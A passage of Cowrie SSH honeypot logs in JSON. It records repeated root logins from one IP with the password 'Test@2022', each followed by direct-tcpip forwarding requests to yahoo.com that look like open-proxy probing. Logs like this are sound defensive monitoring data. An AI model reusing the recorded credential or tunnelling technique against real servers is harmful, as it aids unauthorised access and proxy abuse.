m","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:03:57.775249Z","src_ip":"213.209.150.239","session":"6e721e97c682"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:03:58.057670Z","src_ip":"213.209.150.239","session":"6e721e97c682"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":16399,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:16399","sensor":"my-vps","timestamp":"2025-08-26T01:03:58.115493Z","session":"6e721e97c682"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:58.172757Z","src_ip":"213.209.150.239","session":"6e721e97c682"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":28652,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:28652","sensor":"my-vps","timestamp":"2025-08-26T01:03:58.327079Z","session":"6e721e97c682"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:58.383806Z","src_ip":"213.209.150.239","session":"6e721e97c682"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:03:58.441576Z","src_ip":"213.209.150.239","session":"6e721e97c682"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":29298,"dst_ip":"1.2.3.4","dst_port":22,"session":"2b57491cd6fb","protocol":"ssh","message":"New connection: 213.209.150.239:29298 (1.2.3.4:22) [session: 2b57491cd6fb]","sensor":"my-vps","timestamp":"2025-08-26T01:03:58.487263Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:03:58.487919Z","src_ip":"213.209.150.239","session":"2b57491cd6fb"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:03:58.535107Z","src_ip":"213.209.150.239","session":"2b57491cd6fb"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:03:58.770050Z","src_ip":"213.209.150.239","session":"2b57491cd6fb"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":12959,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:12959","sensor":"my-vps","timestamp":"2025-08-26T01:03:58.818146Z","session":"2b57491cd6fb"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:58.865604Z","src_ip":"213.209.150.239","session":"2b57491cd6fb"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":21221,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:21221","sensor":"my-vps","timestamp":"2025-08-26T01:03:59.001655Z","session":"2b57491cd6fb"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:59.049809Z","src_ip":"213.209.150.239","session":"2b57491cd6fb"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:03:59.097808Z","src_ip":"213.209.150.239","session":"2b57491cd6fb"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":29354,"dst_ip":"1.2.3.4","dst_port":22,"session":"3cbca8a84560","protocol":"ssh","message":"New connection: 213.209.150.239:29354 (1.2.3.4:22) [session: 3cbca8a84560]","sensor":"my-vps","timestamp":"2025-08-26T01:03:59.144000Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:03:59.144784Z","src_ip":"213.209.150.239","session":"3cbca8a84560"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:03:59.192142Z","src_ip":"213.209.150.239","session":"3cbca8a84560"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:03:59.426937Z","src_ip":"213.209.150.239","session":"3cbca8a84560"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":13707,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:13707","sensor":"my-vps","timestamp":"2025-08-26T01:03:59.475065Z","session":"3cbca8a84560"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:59.523126Z","src_ip":"213.209.150.239","session":"3cbca8a84560"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":27553,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:27553","sensor":"my-vps","timestamp":"2025-08-26T01:03:59.657583Z","session":"3cbca8a84560"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:59.704850Z","src_ip":"213.209.150.239","session":"3cbca8a84560"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:03:59.752963Z","src_ip":"213.209.150.239","session":"3cbca8a84560"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":29394,"dst_ip":"1.2.3.4","dst_port":22,"session":"97c0ecbcf239","protocol":"ssh","message":"New connection: 213.209.150.239:29394 (1.2.3.4:22) [session: 97c0ecbcf239]","sensor":"my-vps","timestamp":"2025-08-26T01:03:59.798896Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:03:59.809122Z","src_ip":"213.209.150.239","session":"97c0ecbcf239"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:03:59.846164Z","src_ip":"213.209.150.239","session":"97c0ecbcf239"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:04:00.081016Z","src_ip":"213.209.150.239","session":"97c0ecbcf239"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":25387,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:25387","sensor":"my-vps","timestamp":"2025-08-26T01:04:00.129084Z","session":"97c0ecbcf239"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:00.176319Z","src_ip":"213.209.150.239","session":"97c0ecbcf239"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":4696,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:4696","sensor":"my-vps","timestamp":"2025-08-26T01:04:00.321430Z","session":"97c0ecbcf239"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:00.368647Z","src_ip":"213.209.150.239","session":"97c0ecbcf239"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:04:00.416675Z","src_ip":"213.209.150.239","session":"97c0ecbcf239"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":29433,"dst_ip":"1.2.3.4","dst_port":22,"session":"29dfa12cbc1c","protocol":"ssh","message":"New connection: 213.209.150.239:29433 (1.2.3.4:22) [session: 29dfa12cbc1c]","sensor":"my-vps","timestamp":"2025-08-26T01:04:00.472563Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:04:00.474067Z","src_ip":"213.209.150.239","session":"29dfa12cbc1c"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:04:00.530832Z","src_ip":"213.209.150.239","session":"29dfa12cbc1c"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:04:00.813617Z","src_ip":"213.209.150.239","session":"29dfa12cbc1c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":6546,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:6546","sensor":"my-vps","timestamp":"2025-08-26T01:04:00.871589Z","session":"29dfa12cbc1c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:00.928592Z","src_ip":"213.209.150.239","session":"29dfa12cbc1c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":31454,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:31454","sensor":"my-vps","timestamp":"2025-08-26T01:04:01.083092Z","session":"29dfa12cbc1c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:01.140058Z","src_ip":"213.209.150.239","session":"29dfa12cbc1c"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:04:01.197691Z","src_ip":"213.209.150.239","session":"29dfa12cbc1c"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":29489,"dst_ip":"1.2.3.4","dst_port":22,"session":"4337d5e541a1","protocol":"ssh","message":"New connection: 213.209.150.239:29489 (1.2.3.4:22) [session: 4337d5e541a1]","sensor":"my-vps","timestamp":"2025-08-26T01:04:01.253244Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:04:01.253909Z","src_ip":"213.209.150.239","session":"4337d5e541a1"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:04:01.310699Z","src_ip":"213.209.150.239","session":"4337d5e541a1"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:04:01.593459Z","src_ip":"213.209.150.239","session":"4337d5e541a1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":14693,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:14693","sensor":"my-vps","timestamp":"2025-08-26T01:04:01.651592Z","session":"4337d5e541a1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:01.708667Z","src_ip":"213.209.150.239","session":"4337d5e541a1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":2589,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:2589","sensor":"my-vps","timestamp":"2025-08-26T01:04:01.863394Z","session":"4337d5e541a1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:01.920158Z","src_ip":"213.209.150.239","session":"4337d5e541a1"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:04:01.977941Z","src_ip":"213.209.150.239","session":"4337d5e541a1"}
